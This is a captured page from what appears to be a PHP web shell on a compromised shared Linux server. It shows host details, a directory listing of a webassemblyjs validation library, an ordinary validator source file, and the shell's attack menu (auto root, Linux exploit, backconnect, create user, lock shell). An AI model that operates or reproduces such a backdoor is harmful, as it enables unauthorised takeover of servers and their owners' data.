Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
@webassemblyjs /
validation /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
type-checker
[ DIR ]
drwxr-xr-x
duplicated-exports.js
836
B
-rw-r--r--
import-order.js
1.47
KB
-rw-r--r--
imports.js
658
B
-rw-r--r--
index.js
3.41
KB
-rw-r--r--
is-const.js
1.42
KB
-rw-r--r--
type-checker.js
9.37
KB
-rw-r--r--
type-inference.js
2.02
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : duplicated-exports.js
"use strict"; Object.defineProperty(exports, "__esModule", { value: true }); exports["default"] = validate; var _ast = require("@webassemblyjs/ast"); function duplicatedExports(name) { return "duplicate export name \"".concat(name, "\""); } function validate(ast) { var errors = []; var seenExports = {}; (0, _ast.traverse)(ast, { ModuleExport: function (_ModuleExport) { function ModuleExport(_x) { return _ModuleExport.apply(this, arguments); } ModuleExport.toString = function () { return _ModuleExport.toString(); }; return ModuleExport; }(function (path) { var name = path.node.name; if (seenExports[name] !== undefined) { return errors.push(duplicatedExports(name)); } seenExports[name] = true; }) }); return errors; }
Close